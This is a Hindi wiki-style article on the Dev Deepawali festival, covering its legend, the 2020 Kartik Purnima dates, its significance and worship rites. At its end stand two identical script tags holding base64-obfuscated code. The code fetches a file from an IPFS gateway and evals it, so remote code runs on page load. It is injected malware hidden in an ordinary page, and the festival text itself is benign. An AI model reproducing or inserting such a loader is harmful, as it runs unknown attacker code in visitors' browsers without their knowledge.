देव दीपावली

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (वार्ता | योगदान) द्वारा परिवर्तित 09:27, 9 नवम्बर 2020 का अवतरण (''''देव दीपावली''' दिवाली के 15 दिन बाद मनाई जाती है। मा...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:नेविगेशन, खोजें

देव दीपावली दिवाली के 15 दिन बाद मनाई जाती है। माना जाता है कि इस दिन देवता धरती पर आकर पवित्र गंगा नदी के किनारे दीप जलाते हैं। इस दिन शिव और विष्णु की पूजा की जाती है| कार्तिक मास के शुक्ल पक्ष की पूर्णिमा तिथि को देव दीपावली का त्योहार (Dev Deepawali Festival) मनाया जाता है। पुराणों के अनुसार इसी दिन भगवान शिव ने त्रिपुरासुर नाम के राक्षस का वध किया था। इसी कारण से इसे 'त्रिपुरी पूर्णिमा' के नाम से भी जाना जाता है। इस बात की खुशी को दर्शाने के लिए देव दीपावली के दिन सभी देवता धरती पर आकर गंगा किनारे दीप प्रज्वलित करते हैं और इसी कारण से हर साल देव दीपावली का त्योहार मनाया जाता है।

तिथि

कार्तिक पूर्णिमा वर्ष 2020 में 30 नवंबर को मनाई जाएगी। कार्तिक मास का समापन पूर्णिमा के साथ ही हो जाएगा। कार्तिक मास की पूर्णिमा के दिन ही देवताओं की दीपावली होती है। देवोत्थान एकादशी के दिन देवता चार महीने सोने के बाद उठते हैं और उनके उठने की खुशी में ही कार्तिक पूर्णिमा के दिन देव दीपावली मनाई जाती है, लेकिन 2020 में पूर्णिमा का प्रारंभ 29 नवंबर से ही हो रहा है, इसलिए देव दिपावली इस बार 29 नंवबर को ही मनाई जाएगी, जबकि दान-पुण्य और पूजा आदि पूर्णिमा का 30 नंवबर को होगा। कार्तिक पूर्णिमा को 'त्रिपुरी पूर्णिमा' या 'त्रिपुरारी पूर्णिमा' के नाम से भी जाना जाता है।[1]

कार्तिक पूर्णिमा तिथि

पूर्णिमा तिथि प्रारम्भ - 29 नवम्बर, 2020 दोपहर 12 बजकर 47 मिनट से प्रारंभ होकर अगले दिन 30 नंवबर को दोपहर 2 बजकर 59 मिनट तक रहेगी। क्योंकि 30 की रात में पूर्णिमा नहीं होगी, इसलिए देव दीपावली 29 को होगी और पूर्णिमा रात से शुरू हो रही है तो पूर्णिमा की पूजा 30 नंवबर को होगी। कार्तिक पूर्णिमा का उत्सव प्रबोधिनी एकादशी से शुरू होता है।

महत्व

कार्तिक पूर्णिमा के दिन व्रत करने और दान-पुण्य करने का विशेष महत्व होता है। मान्यता है कि इस दिन व्रत-पूजन और दान करने से पापों की मुक्ति होती है और घर में सुख शांति-शांति और समृद्धि आती है। कार्तिक पूर्णिमा धार्मिक और आध्यात्मिक रूप से महत्वपूर्ण है, क्योंकि कार्तिक पूर्णिमा का व्रत और पूजन करने से भगवान विष्णु का आशीर्वाद प्राप्त होता है। धार्मिक आयोजन और आध्यात्मिक तपस्या करने के लिए कार्तिक पूर्णिमा को सबसे पवित्र दिन माना गया है। माना जाता है कि कार्तिक मे पूरे मास गंगा स्नान और दान आदि करने से 100 अश्वमेघ यज्ञ के समान पुण्य प्राप्त होता है।

व्रत पूजा विधान

कार्तिक पूर्णिमा के दिन गंगा नदी या स्नान के पानी में गंगाजल मिश्रित कर लेना चाहिए। स्नान के बाद भगवान विष्णु की पूजा करें और उन्हें धूप-दीप नैवेद्य और पुष्प अर्पित करें और सत्यनारायण कथा का पाठ कराना चाहिए और एकादशी के दिन तुलसी और शालिग्राम जी के विवाह का उत्सव भी कार्तिक पूर्णिमा के दिन मनाया जाता है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका-टिप्पणी और संदर्भ

  1. इस बार Kartik Purnima से पहले मनाई जाएगी देवी द‍िवाली (हिंदी) timesnowhindi.com। अभिगमन तिथि: 09 नवंबर, 2020।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>